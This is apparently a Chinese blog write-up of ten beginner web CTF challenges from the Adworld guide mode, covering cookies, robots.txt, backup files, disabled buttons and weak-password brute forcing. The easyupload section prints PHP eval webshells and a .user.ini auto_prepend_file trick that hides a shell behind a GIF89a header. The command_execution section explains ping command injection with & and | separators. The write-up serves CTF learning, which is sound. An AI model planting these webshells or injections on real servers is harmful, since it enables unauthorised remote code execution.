攻防世界web引导模式(1)

文章介绍了多个网络安全相关的挑战,包括通过Cookie获取信息、利用PHP的auto_prepend_file进行文件上传、robots.txt的使用、备份文件的寻找、GET与POST请求的区别、查看页面源代码的技巧、禁用按钮的前端破解、弱认证的暴力破解以及远程命令执行漏洞的利用。每个挑战都提供了详细的解题思路和相关知识点。
摘要由CSDN通过智能技术生成

目录

 1.cookie

 2.easyupload

 3.robots

 4.backup

 5.get&POST

 6. view_source

 7.disabled_button

 8.weak-auth

 9.command_execution

 10.baby_web


1.cookie:

X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:‘这是夹心饼干的意思吗?’

①可以再火狐F12查看cookie,或者bp直接抓包查看cookie

②在网页的url后面加上cookie,然后可以发现跳转到这个页面

③对页面进行刷新,才用bp进行抓包,通过action发送到Repeter,然后从Repeter中发送得到响应包,flag就在响应包中

2.easyupload

知识点:

.user.ini文件是php.ini的补充文件,当网页访问的时候就会自动查看当前目录下是否有.user.ini,然后将其补充进php.ini,并作为cgi的启动项。虽然其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file。(php.ini文件是web服务器php环境的核心的配置文件,它控制着一些重要功能的启用与否。)它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。

php 配置项中有两个配置可以起到一些作用

auto_prepend_file = <filename> //包含在文件头

auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

 index.php是什么文件? index.php文件是一个php网站首页文件,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对

  解题思路:

        1.我们在进行文件上传的时候会有Content-Type检测,我们需要将其换为image/jpg,就不会进行拦截

        2.我们在写文件(一句话木马和,user.ini)的时候会有头部信息的检测,需要在其前面加上图片头GIF89a进行绕过

        3.本题继续了php的内容过滤进行绕过,我们可以采用对php进行大写绕过(Php),还可以进行短标签绕过

一句话木马

<?Php eval(@$_POST['password']);?>

短标签绕过 

<?=eval($_REQUEST[passward]);?>

①我们先写两个文件.user.ini和shell(一句话木马)文件

.user.ini

GIF89a                  
auto_prepend_file=shell.jpg   

shell

GIF89a
<?Php eval(@$_POST['password']);?>

②进行文件上传bp抓包,修改其Content-Type的值,并且上传shell文件,更改其后缀名为jpg

上传失败的图

上传成功的图

这里有一个需要注意的点是用蚁剑进行连接的时候路径是url/uploads/index.php 

3.robots

robots.txt是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络爬虫/蜘蛛),此网站中的哪些内容是不能被搜索引擎的漫游器获取的,哪些是可以被获取的。
当robots访问一个网站时,首先会检查该网站中是否存在这个文件,如果机器人找到这个文件,它就会根据这个文件的内容,来确定它访问权限的范围
因为一些系统中的URL是大小写敏感的,所以robots.txt的文件名应统一为小写

①直接访问robots.txt,可以看到flag所在

②直接在URL后面跟上提示就可以得到flag

 4.backup

①常见网络备份文件后缀名:“.git” 、“.svn”、“ .swp” “.~”、“.bak”、“.bash_history”、“.bkf”、“.zip” 

直接在url后面加上.bak就可以得到备份文件的txt,查看txt就可以(一个一个试)

 ②通过disearch进行扫描,看到他的文件目录下有.bak的文件,直接在url后面跟上他就可以

 5.get&POST

get请求方式是直接把参数写在url里面 

POST请求的提交方式,在火狐离开浏览器按F12发开HackBa'rar

6. view_source

X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。

方法一:直接bp进行抓包,发送到repeter中,在进行send得到相应包,从中可以查看到flag

 方法二:火狐浏览器直接按F12可以查看页面的源代码

 7.disabled_button

X老师今天上课讲了前端知识,然后给了大家一个不能按的按钮,小宁惊奇地发现这个按钮按不下去,到底怎么才能按下去呢?

知识点:

disabled

disabled 属性规定应该禁用 input 元素。

被禁用的 input 元素既不可用,也不可点击。可以设置 disabled 属性,直到满足某些其他的条件为止(比如选择了一个复选框等等)。然后,就需要通过 JavaScript 来删除 disabled 值,将 input 元素的值切换为可用。

注释:disabled 属性无法与 <input type="hidden"> 一起使用。

方法一:在火狐浏览器中用F12查看页面源代码,可以看到input标签中有disabled属性

 我们直接右键编辑html,删掉disabled属性就可以按flag按钮了

 方法二:用hackbar,用post方式传递auth=flag,同样可以获得flag

 8.weak-auth

BurpSuite系列(五)----Intruder模块(暴力破解)_码农致富的博客-CSDN博客

先随便输一个用户名,会提醒得用admin账户登陆

用admin账户进行登陆,密码不输入直接登陆,会提示密码错误,在这个地方会提示你需要一个字典

看到字典就想到密码爆破,用bp处理。用bp抓包,发送到inturder模块。

使用一对§字符来标记出有效负荷的位置,可以进行增加和删减有效载荷的

 到payloads模块进行加载字典(字典我是用真空密码生成器生成的)

 但这题明显密码肯定不可能复杂随便写几个简单的密码试一下就可以,然后开始攻击,长度不一样的那一个就是密码

 最后输入我们admin的用户名和123456的密码就可以得到flag

 9.command_execution

小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

知识点:

        1. 不同的操作系统有些命令是不一样的。 ls 能执行就是linux 系统,执行不出来就是win系统

        2.windows系统      不区分大小写的
           查看这台电脑的ip地址:ipconfig
           查看当前目录下的命令:dir
           查看目录文件的内容   :type

        3.inux   系统      严格区分大小写   
            查看这台电脑的ip地址:ifconfig  或者 ip  add 
            查看当前目录下的命令:dir   或者   ls
            查看目录文件的内容   :cat 

         4.连接符:&  |  ||
步骤:

        ①我们可以先ping一下,发现ping完之后页面是有显示出来ping的结果的

         ②我们可以尝试在ping的后面加上系统的命令,看下是否可以把命令结果显示出来,这里可以看到结果是可以显示出来的,这个就是RCE漏洞(远程命令执行漏洞),并且我们可以判断出来这台服务器用的是linux操作系统的漏洞。(官方给出的答案是windows,但尝试过win命令是不行的)  

         ③通过ls命令进行查找,发现flag在/home路径中

         ④读取flag(在这一步用type是不行的)

 10.baby_web

题目描述:想想初始页面是哪个

初始页面一下子就想到index.php,所以我们直接尝试在url后面把直接加上index.php。我们发现不管怎么改,都会跳回1.php

方法一:用火狐浏览器的F12进如开发者模式,进入选项卡,可以看到有三个,但还是没看到index.php,但我们看到了网站的/,flag应该就在这里

 方法二:用bp进行抓包,通过action发送到repeter模块。修改数据包中的1.php修改成index.php就可以得到flag 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

偷吃"游"的阿彪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值